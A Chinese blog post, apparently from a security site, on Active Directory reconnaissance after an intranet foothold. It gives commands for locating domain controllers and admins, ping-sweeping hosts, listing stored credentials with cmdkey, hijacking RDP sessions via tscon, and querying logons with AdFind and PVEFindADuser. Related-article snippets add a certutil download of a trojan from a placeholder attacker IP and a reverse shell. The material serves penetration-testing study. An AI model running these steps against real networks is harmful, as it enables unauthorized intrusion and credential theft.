域环境下的信息搜集(详细)

VSole2022-07-07 16:07:25

01

单域环境

单域环境

查看域环境用户

查看时间/dns服务器(一般为域控)

net time /domain /net view /domain

shell net group "Domain Controllers" /domain

02

查看域控制器

查看域控制器

可以得到域控制器IP地址

域控还可能开放88 Kerberos 协议,01389 ldap,

DNS 53 如果存在EXECHANGE 邮件服务器那么也开放了25还有我们熟悉的139,445.

03

查看身处在哪个域

查看身处在哪个域

net config workstaon

shell nltest /dclist:de.org 同样可以得到域控地址net group "domain admins" /domain 查看域管有哪些

04

信息收集

信息收集:

确定存在内网后可以使用

for /L %I in (1,1,254) DO @ping -w 1 -n 1 192.168.1.%I | findstr "TTL=“

该命令批量ping 出存活的IP ,如果没有存在策略限制一般Ping出存货的IP都可以进行端口扫描等操作。

同等可以使用 nbtscan /fscan等内网扫描工具替代。

查看net use 有没有IPC连过来的机器

cmdkey /list 用户凭据

可以再

 net view \\xx

查看有没有开启共享目录。

之后可以查看一下用户进程查看有没有其他用户进程可以注入/窃取。

echo %logonserver% 查看当前登录域 quser 可以查询 当前在线的user

插播tips(3389 system权限 tscon 加id可以直接切换用户无需知道密码)。

查找 文件 dir /s /b xxxx.exe

插播tips2:

如果不知道web目录可以拿一个web的js来定位web位置

cmd /c "for /f "delims=" %i in ('dir /s /b c:bsa.js') do (echo %i> %i.path.txt)&(ipconfig > %i.ipconfig.txt)"

会在 js下生成一个txt 里边有web的目录地址域控常见命令:

dsquery server - 查找目录中的 AD DC/LDS 实例dsquery user - 查找目录中的用户dsquery computer 查

主机发现系列:

查看内网其他IP 3389 的登录记录

 arp -a

如何使用域用户查看当前用户机器?用户登录主机?

ADfind.exe,Psloggedon.exe,PvefindADuser.exe,powerview.

ADfind使用方法

查看DC机器

查看域内在活动的机器

AdFind.exe -sc computers_active name dnshostname

查看详细域内机器

shell AdFind.exe -b dc=tide,dc=org -f "objectcategory=computer"

查看能登陆的389以及机器

shell AdFind.exe -h 192.168.100.10 -sc u:tideone userWorkstations

使用PVEFindaduser查看当前用户胡登录的主机

shell PVEFindaduser -current -nopingPVEFindADuser -current -target 192.168.91.133 查看指定IP的登录记录
PVEFindADuser -last 查看上次
域控制器shell
本作品采用《CC 协议》,转载必须注明作者和本文链接
最近,一个名为Zerologon的严重漏洞–CVE-2020-1472–已成为全球范围内的趋势主题。从攻击者的角度来看,与域控制器进行通信时,这种情况是可能的。为了利用这些潜在的漏洞,外部代理滥用了File-Manager插件中的漏洞–CVE-2020-25213,该漏洞允许在服务器端执行任意代码。根据WordFence的数据,到2020年9月4日,记录到超过170万个站点受到攻击,而到2020年9月10日,受攻击的站点总数已超过260万。同时,影响WP-Manager WordPress插件的CVE-2020-25213仍被犯罪分子利用。
主要记录拿到Shell后再反弹MSF Shell、Mimikatz抓取密码以及登录域控等内网部分。前面漏洞环境搭建及打点等不作记录,可查看参考文章。攻击机利用Python开启HTTP服务$ python -m SimpleHTTPServer 8080. 靶机CMD下载木马文件$ certutil.exe -urlcache -split -f http://<攻击者IP>:8080/win.exe. [*] Started reverse TCP handler on <攻击者IP>:<攻击机监听端口>. 并且需要迁移到权限为NT AUTHORITY\SYSTEM的进程,因为进程迁移后meterpreter的权限是迁移进程的权限。查看靶机位数&进程meterpreter > sysinfo # 查看位数。配置路由meterpreter > run autoroute -s 192.168.52.0/24. MS17-010扫一下MS17-010meterpreter > background # 后台挂起Session
域环境下的信息搜集
2023-05-23 09:25:36
单域环境查看域环境用户查看时间/dns服务器net time /domain /net view /domain. 查看域控制器可以得到域控制器IP地址域控还可能开放88 Kerberos 协议,01389 ldap,DNS 53 如果存在EXECHANGE 邮件服务器那么也开放了25还有我们熟悉的139,445.查看身处在哪个域net?该命令批量ping 出存活的IP ,如果没有存在策略限制一般Ping出存货的IP都可以进行端口扫描等操作。同等可以使用 nbtscan /fscan等内网扫描工具替代。会在 js下生成一个txt 里边有web的目录地址域控常见命令:查找目录中的?查看指定IP的登录记录PVEFindADuser -current -target 192.168.91.133
在渗透测试的过程中,我们可以通过常见的漏洞来获取shell,我们获取到的shell通常是各个公司对外开放的网站以及APP应用等属于外网(可以通过计算机直接访问),如果我们想要获取该公司内部的一些内部信息就要进入该公司的内部网络(内网)本文将会对内网进行简单介绍并且搭建一个简单地内部网络环境,来熟悉了解什么是内网。
内网渗透TIPS总结
2023-01-28 11:00:41
内网基础知识1、工作组:工作组是 局域网 中的一个概念,他是长久的资源管理模式。默认情况下使用工作组方式进行资源管理,将不同的 computer 按照不同的要求分类到不同的组。而实际上,因为域名的计算机是使用DNS 来定位域控制器、服务器及其他计算机、网络服务的,所以域的名字就是DNS 域的名字。在内网渗透测试中,大都是通过寻找 DNS 服务器来确定域控制器的位置的。
域环境下的信息搜集(详细)
黑客利用 Adob​​e ColdFusion 漏洞入侵美国政府机构
抓取域密码哈希的各种工具集合。
VSole
网络安全专家